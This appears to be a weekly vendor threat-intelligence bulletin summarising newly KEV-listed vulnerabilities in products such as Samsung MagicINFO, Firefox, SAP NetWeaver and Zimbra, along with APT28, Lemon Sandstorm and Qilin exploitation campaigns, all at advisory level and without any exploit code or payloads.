This week’s cybersecurity landscape saw a surge in threat actor activity, as nine   vulnerabilities were added to the CISA Known Exploited Vulnerabilities (KEV) catalog. The list spans critical flaws across Ivanti, Srimax Output Messenger, Synacor Zimbra, ZKTeco BioTime, Samsung MagicINFO, and MDaemon Email Server underscoring the growing risks to enterprise communication, collaboration, and operational platforms. The diversity of affected technologies highlights the increasing sophistication and reach of exploitation campaigns. Meanwhile, Mozilla has issued urgent fixes for two vulnerabilities in Firefox, which were exploited as zero-days during the Pwn2Own Berlin 2025 hacking contest, highlighting the growing need for rapid patch deployment in response to emerging threats.

Botnet activity surged, with EnemyBot, Sysrv-K, Andoryu, and Androxgh0st targeting flaws in platforms such as Cloud Gateway, GitLab, and PHP services. In parallel, IoT malware including Bashlite, BrickerBot, Tsunami, and Mirai focused on compromising Eir D1000 modems, rapidly scaling up their infected device networks.  

State-sponsored cyber activity remained a key concern this week, with multiple campaigns linked to advanced persistent threat (APT) groups. ESET attributed a recent espionage operation dubbed Operation RoundPress to APT28, which leveraged vulnerabilities in MDaemon Email Server and Synacor Zimbra Collaboration Suite. Meanwhile, FortiGuard Incident Response highlighted a nearly two-year-long intrusion by an Iranian-backed actor targeting Middle Eastern critical infrastructure, exploiting flaws in ZKTeco BioTime. In a separate discovery, OP Innovate revealed that a critical vulnerability in SAP NetWeaver Visual Composer was exploited weeks before public disclosure, likely by the Qilin ransomware group. Complementing these findings, a joint CISA advisory detailed an ongoing campaign by APT28 that actively exploits Roundcube vulnerabilities as part of broader cyber espionage efforts against Western logistics and tech firms.

Current trending vulnerabilities offer insights into the latest emerging and widely discussed threats, helping to make informed decisions.

CVE-2025-4632
A Path Traversal Vulnerability in the Samsung MagicINFO 9 Server allows attackers to write arbitrary files with system-level privileges, potentially enabling full system compromise. With a critical CVSS Score of 9.8, this flaw affects versions prior to 21.1052. This vulnerability was observed to be exploited in the wild, soon after a proof-of-concept was released by SSD disclosure on April 30, 2025. Threat actors have leveraged this flaw in some cases to deploy the Mirai botnet, highlighting its severity and widespread impact. Due to confirmed active exploitation, it has also been added to the CISA Known Exploited Vulnerabilities (KEV) catalog.

CVE-2025-4664  
A critical Insufficient Policy Enforcement Vulnerability affecting Google Chrome’s Loader logic has been uncovered, enabling threat actors to bypass security restrictions and potentially execute arbitrary code or escape the browser sandbox. The flaw poses serious security implications, particularly if leveraged to gain deeper access to user systems. Public disclosure via an X post suggests possible active exploitation in the wild prior to mitigation. In response, Google issued emergency updates, patching the flaw in Chrome versions 136.0.7103.113/.114 for Windows and Mac, and 136.0.7103.113 for Linux. Given the confirmed exploitation, the vulnerability has been officially listed in the CISA Known Exploited Vulnerabilities (KEV) catalog, reinforcing the urgency for all users to apply the latest updates without delay.

CVE-2025-4918
An Out-of-Bounds Access Vulnerability in the Mozilla Firefox has been identified as a high-severity flaw, rated 7.5 on the CVSS scale, affecting versions prior to Firefox 138.0.4, Firefox ESR 128.10.1, and Firefox ESR 115.23.1. The flaw, which was actively exploited as zero-day during the Pwn2Own Berlin 2025 hacking competition, involves improper handling of JavaScript Promise objects, potentially enabling attackers to perform arbitrary memory reads or writes. Such unauthorized access could lead to the exposure of sensitive data or trigger memory corruption, ultimately paving the way for remote code execution. While the impact was initially limited, immediate patching is strongly recommended to mitigate potential risks.

‍CVE-2025-4919
An Out-of-Bounds Access Vulnerability in Mozilla Firefox has been identified with a high CVSS Score of 8.8, affecting versions prior to Firefox 138.0.4, Firefox ESR 128.10.1, and Firefox ESR 115.23.1. This flaw which was actively exploited as zero-day during the Pwn2Own Berlin 2025 hacking competition, stems from improper handling of array index sizes, allowing attackers to manipulate JavaScript objects. Successful exploitation could lead to unauthorized memory access, exposing sensitive data or causing memory corruption that may enable code execution. Mozilla has issued security updates to address the issue, and users are strongly urged to apply the patches promptly to mitigate potential threats.

‍CVE-2025-27920
A Directory Traversal Vulnerability was identified in the Srimax Output Messenger, affecting versions prior to 2.0.63. With a high CVSS Score of 7.2, this flaw allows attackers to access files outside the intended directory structure, potentially exposing configuration files or enabling arbitrary file access. This vulnerability resides in the file upload mechanism of the Output Drive feature, which is designed to facilitate file sharing between users and the server. By exploiting this weakness, an authenticated user could upload malicious files directly into the server's startup directory, specifically, C:\Program Files\Output Messenger Server\OfflineMessages\Temp\1\File leading to remote code execution. Microsoft security researchers have attributed zero-day exploitation of this flaw to the threat actor Marbled Dust, who used it as part of a targeted intrusion campaign. The issue has since been addressed with the release of version 2.0.63, and the vulnerability has also been added to the CISA Known Exploited Vulnerabilities (KEV) catalog, highlighting its active exploitation in the wild.

CVE-2025-42999  
A Deserialization Vulnerability has been identified in the SAP NetWeaver Visual Composer development server. With a critical CVSS Score of 9.1, this flaw enables a privileged attacker to deserialize malicious input, potentially compromising the confidentiality, integrity, and availability of the host system. Notably, this issue follows the previously disclosed CVE-2025-31324, an unrestricted file upload vulnerability affecting the same component, reported in April 2025, indicating continued risk within this module. Therefore, the vulnerability has been added to the CISA KEV catalog, warranting urgent patching and mitigation measures.

CVE-2024-11182
A Cross-Site Scripting Vulnerability (XSS) has been identified in MDaemon Email Server, affecting versions prior to 24.5.1c. This flaw allows a remote attacker to inject and execute arbitrary JavaScript code by sending a specially crafted HTML email. Notably, no further user interaction is required beyond the act of opening the malicious email, making exploitation highly feasible in real-world scenarios. The vulnerability exposes users to potential risks such as data theft, session hijacking, or unauthorized actions performed on behalf of the victim. Due to its confirmed exploitation in the wild, this vulnerability has been added to the CISA KEV catalog, urging organizations to prioritize patching and upgrade to the latest secure version 24.5.1.

CVE-2024-12987
An OS Command Injection Vulnerability has been identified in the DrayTek Vigor Routers affecting models Vigor2960, Vigor300B, and Vigor3900. Having a high CVSS Score of 7.3, this flaw originates from an undocumented function within the file /cgi-bin/mainfunction.cgi/apmcfgupload in the web management interface, which could allow a remote attacker to execute arbitrary system commands. This vulnerability has been resolved by DrayTek in the firmware version 1.5.1.5. It has recently been added to the CISA KEV catalog, underscoring the urgency of affected organizations to update their devices immediately.

CVE-2024-27443
A Cross-Site Scripting (XSS) Vulnerability has been discovered in the Synacor Zimbra Collaboration Suite (ZCS), specifically within the CalendarInvite feature of the classic webmail interface. This flaw affects versions 9.0 and 10.0 and originates from improper sanitization of the cif (Calendar Intended For) attribute used in email calendar invitations. Successful exploitations could allow malicious JavaScript code to be executed in the user's browser, potentially leading to data theft, session hijacking, or other client-side attacks. Zimbra has addressed the issue in version 9.0.0 Patch 39 and 10.0.7, and due to active exploitation, the vulnerability has been listed in the CISA KEV catalog, urging users to apply the necessary patches promptly.

CVE-2023-38950
A Path Traversal Vulnerability in the ZKTeco BioTime version v8.5.5 allows unauthenticated attackers to access arbitrary files by submitting specially crafted payloads. Rated with a high CVSS Score of 7.5, this flaw permits bypassing standard access controls, potentially leading to unauthorized exposure of sensitive system files and a compromise of system confidentiality and integrity. BioTime is a robust time and attendance management platform that connects with thousands of ZKTeco’s standalone push communication devices via Ethernet, Wi-Fi, 3G, or 4G, and operates as a private cloud, enabling employee self-service through mobile apps and web browsers. Despite its wide enterprise adoption, no official patch has been issued by ZKTeco to remediate this vulnerability. Due to confirmed exploitation in the wild, it has been added to the CISA Known Exploited Vulnerabilities (KEV) catalog, highlighting the need for immediate defensive measures.

Telemetry collected from Loginsoft sensors were analyzed and processed to derive insights on what is actively being exploited and actively being scanned.  As source of truth, source IPv4 addresses & payloads can be provided on need-to-know basis.

Identified vulnerabilities exploited by botnets, including recent CVEs logged in Misp. Presenting the top 5 CVEs with payloads suggestive of botnet activities, like utilizing wget with IP addresses.

We proactively monitor the vulnerabilities which are targeted by adversaries. Each vulnerability is humanly studied and mapped with Mitre ATT&CK tactics and techniques. Source of information is derived from our vulnerability intelligence platform collected and curated information from various sources such as Twitter, Telegram, OSINT groups, Blogs, Data leak Sites and more.    

Qilin-Linked Exploitation of SAP NetWeaver Zero-Day

OP Innovate has identified early, real-world exploitation of CVE-2025-31324, a critical unauthenticated file upload vulnerability in SAP NetWeaver Visual Composer, exploited weeks before public disclosure. The flaw, located in the /developmentserver/metadatauploader endpoint, allowed attackers likely linked to the Qilin Ransomware-as-a-Service group to upload JSP-based web shells via HTTP, gaining remote command execution. Access was achieved through an exposed SAP Metadata Uploader endpoint, likely due to a misconfigured load balancer. The incident underscores the urgent need to secure SAP environments and eliminate internet-exposed high-risk services.

CVE-2024-11182 and CVE-2024-27443

ESET has attributed a recent cyber espionage campaign, codenamed Operation RoundPress, to the Russian state-sponsored threat actor APT-28 also known by numerous aliases such as BlueDelta, Fancy Bear, Fighting Ursa, Forest Blizzard, FROZENLAKE, Iron Twilight, ITG05, Pawn Storm, Sednit, Sofacy, and TA422.  

This operation targeted email communications by exploiting two cross-site scripting (XSS) vulnerabilities, CVE-2024-11182 and CVE-2024-27443, to exfiltrate sensitive data from specific webmail accounts. The campaign involves sending malicious emails that, when opened in a vulnerable webmail client, executed embedded JavaScript code hidden within the HTML body of the message. While the email appeared benign on the surface, the code enabled the deployment of an obfuscated payload known as "SpyPress" designed to capture webmail credentials and extract emails and contact lists from compromised accounts. Though the malware lacks persistence, it reactivates each time the infected email is viewed. To protect against threats like Operation RoundPress, users should avoid opening unexpected or suspicious emails, especially in webmail interfaces.

Lemon Sandstorm leverages ZKTeco BioTime vulnerabilities for Persistent Access

A prolonged cyber intrusion targeting a critical national infrastructure (CNI) entity in the Middle East has been attributed to an Iranian state-sponsored threat group. The campaign, active between May 2023 and February 2025, involved an extensive espionage operation and strategic network prepositioning, a technique commonly employed by advanced persistent threat (APT) actors to ensure long-term access to high-value networks. According to the FortiGuard Incident Response (FGIR) team, the tactics and tools used throughout the operation closely align with activity previously associated with the Iranian nation-state group Lemon Sandstorm. This threat actor is also known by several aliases, including Rubidium, Parisite, Pioneer Kitten, and UNC757.

Following a temporary eviction by the targeted organization, renewed intrusion attempts were observed beginning December 14, 2024. These efforts included the exploitation of multiple known vulnerabilities in ZKTeco BioTime systems specifically CVE-2023-38950, CVE-2023-38951, and CVE-2023-38952. In addition, a spear-phishing campaign was launched against 11 employees, aiming to collect Microsoft 365 credentials as a means of reestablishing access. These tactics demonstrate a persistent and adaptive adversary focused on maintaining a foothold within strategically important networks.

Russian Hackers Exploit Email and VPN Flaws to Target Ukraine Aid Logistics

A recent advisory from the Cybersecurity and Infrastructure Security Agency (CISA) has attributed an ongoing state-sponsored cyber espionage campaign to the Russian threat actor APT28, also known as BlueDelta, Fancy Bear, or Forest Blizzard. Active since 2022, this operation targets Western logistics companies and technology firms, particularly those involved in coordinating and transporting foreign assistance to Ukraine. The campaign, linked to the Russian General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center, employs a range of tactics, techniques, and procedures (TTPs), including exploitation of the Outlook NTLM vulnerability CVE-2023-23397, multiple Roundcube vulnerabilities CVE-2020-12641, CVE-2020-35730, CVE-2021-44026, and attacks against internet-facing corporate VPNs via public vulnerabilities and SQL injection. Additionally, exploitation of the WinRAR vulnerability CVE-2023-38831 has been observed. This broad targeting aligns with APT28’s previous campaigns against IP cameras in Ukraine and NATO border countries, underscoring the group’s focus on espionage activities within critical infrastructure sectors.

It refers to vulnerabilities discovered and potentially exploited before their official inclusion in the National Vulnerability Database. The LOVI Platform aggregates and distributes data from open sources and social media, currently tracking over 100 security alerts and planning to expand.

1. https://www.cisa.gov/news-events/alerts/2025/05/15/cisa-adds-three-known-exploited-vulnerabilities-catalog
2. https://blog.mozilla.org/security/2025/05/17/firefox-security-response-to-pwn2own-2025/
3. https://www.cisa.gov/news-events/alerts/2025/05/19/cisa-adds-six-known-exploited-vulnerabilities-catalog
4. https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-141a  
5. https://op-c.net/blog/sap-cve-2025-31324-qilin-breach/  
6. https://www.fortinet.com/content/dam/fortinet/assets/reports/report-incident-response-middle-east.pdf  
7. https://www.welivesecurity.com/en/eset-research/operation-roundpress/